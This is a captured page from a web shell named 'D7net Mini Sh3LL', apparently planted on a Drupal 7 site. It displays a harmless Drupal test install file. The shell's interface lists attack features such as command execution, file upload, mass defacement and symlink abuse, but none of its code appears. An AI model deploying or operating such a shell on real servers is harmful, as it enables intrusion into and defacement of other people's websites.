D7net Mini Sh3LL v1

 
OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /var/www/html/antarctic-drupal-7.89/modules/toolbar/../openid/tests/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : /var/www/html/antarctic-drupal-7.89/modules/toolbar/../openid/tests/openid_test.install
<?php

/**
 * @file
 * Install, update and uninstall functions for the openid_test module.
 */

/**
 * Implements hook_install().
 */
function openid_test_install() {
  module_load_include('inc', 'openid');
  // Generate a MAC key (Message Authentication Code) used for signing messages.
  // The variable is base64-encoded, because variables cannot contain non-UTF-8
  // data.
  variable_set('openid_test_mac_key', drupal_random_key(20));
}

AnonSec - 2021 | Recode By D7net